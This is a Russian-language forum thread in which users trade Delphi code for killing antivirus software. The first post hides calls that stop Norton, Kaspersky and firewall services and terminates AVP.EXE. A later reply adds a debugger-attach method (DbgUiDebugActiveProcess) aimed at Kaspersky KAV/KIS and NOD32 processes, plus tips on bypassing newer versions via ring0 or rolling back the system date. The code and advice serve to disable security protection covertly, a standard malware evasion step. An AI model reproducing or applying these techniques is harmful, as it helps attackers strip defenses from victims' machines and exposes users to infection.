Завершение процесса антивируса

[Terran]

Уважаемые!
Подскажите пожалуста. Почему не завершается процесс антивируса??? Я использовал код приведённый ниже. Когда я указывал любой обычный процесс, то он мигом завершался, а антивирусный не хочет. Может в самом коде программы чтото неправильно?

Код:

uses
   Tlhelp32,


function KillTask(ExeFileName: string): integer;
const
  PROCESS_TERMINATE=$0001;
var
  ContinueLoop: BOOL;
  FSnapshotHandle: THandle;
  FProcessEntry32: TProcessEntry32;
begin
  result := 0;

  FSnapshotHandle := CreateToolhelp32Snapshot
  (TH32CS_SNAPPROCESS, 0);
  FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
  ContinueLoop := Process32First(FSnapshotHandle,
  FProcessEntry32);

  while integer(ContinueLoop) <> 0 do
  begin
    if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
    UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFile) =
    UpperCase(ExeFileName))) then
      Result := Integer(TerminateProcess(OpenProcess(
      PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0));
    ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
  end;

  CloseHandle(FSnapshotHandle);
end;
begin

WINEXEC('NET STOP NAVAPSVC',SW_HIDE);
WINEXEC('NET STOP PERSFW',SW_HIDE);
WINEXEC('NET STOP AVPCC',SW_HIDE);
KillTask('AVP.EXE');
End.

Заранее благодарен!

[GAGARIN-NEW]

В коде всё правильно
Просто антивирь както цепляется в системе на то он и каспер =)

[VDLab]

C антивирями все не так просто. Во первых, это системные службы, они даже в случае завершения процесса через некотрое время(у меня например, 5-10 секунд, НОД32) снова запускаются. Во вторых, если антивирь можно было бы так просто вырубить, грош ему цена.
Мне как то нужно было полностью вырубить антивирус, так целый час хитался, пока нашел, как отключить перезапуск процесса...
Кроме того многие антивирусные программы очень ревниво относятся к прогам, которые хотят их отключить, и кто кого отключит, это еще вопрос...

[FaTaL]

Цитата:

Сообщение от Terran

Уважаемые!
Подскажите пожалуста. Почему не завершается процесс антивируса??? Я использовал код приведённый ниже. Когда я указывал любой обычный процесс, то он мигом завершался, а антивирусный не хочет. Может в самом коде программы чтото неправильно?


uses
Tlhelp32,


function KillTask(ExeFileName: string): integer;
const
PROCESS_TERMINATE=$0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
result := 0;

FSnapshotHandle := CreateToolhelp32Snapshot
(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle,
FProcessEntry32);

while integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProces sEntry32.szExeFile)) =
UpperCase(ExeFileName)) or (UpperCase(FProcessEntry32.szExeFil e) =
UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(OpenProces s(
PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;

CloseHandle(FSnapshotHandle);
end;
begin

WINEXEC('NET STOP NAVAPSVC',SW_HIDE);
WINEXEC('NET STOP PERSFW',SW_HIDE);
WINEXEC('NET STOP AVPCC',SW_HIDE);
KillTask('AVP.EXE');
End.
Заранее благодарен!

Боролся 3 дня с этим пока нашёл выход. Сейчас процедуру не помню. На работу завтра приду напишу. Так же вырубал антивир только NOD32

[GAGARIN-NEW]

Кстате нод я в диспетчере вырубал бес проблем ! а вот каспера или панду ф*г завершиш =)

[Terran]

Всем БОЛЬШОЕ спасибо за помощь!!!

[Air]

Вот что я использую:
uses ...advApiHook,NativeAPI...


var
Form1: TForm1;
Function DbgUiDebugActiveProcess(pHandle: dword): NTStatus;stdcall;external 'ntdll.dll';
Function DbgUiConnectToDbg(): NTStatus;stdcall;external 'ntdll.dll'; {Для отладки}

implementation

{$R *.dfm}

procedure TForm1.KillKAV;
begin
DebugKillProcess(GetProcessId('kav. exe'));
end;

procedure TForm1.KillKIS;
begin
DebugKillProcess(GetProcessId('kis. exe'));
end;

procedure TForm1.KillNOD32;
begin
// сервис Nod32 - 'Nod32krn.exe' %Prograndir%\Eset\Nod32krn.exe
DebugKillProcess(GetProcessId('Nod3 2krn.exe'));
end;
// На 6 версию каси не действует, выбить процесс можно только через Ring0 (память CPU) или сменить
// системную дату на 1-2 года назад.

В архиве примеры и модули "advApiHook.pas", "NativeAPI.pas"

[Terran]

Спасибо за помощь!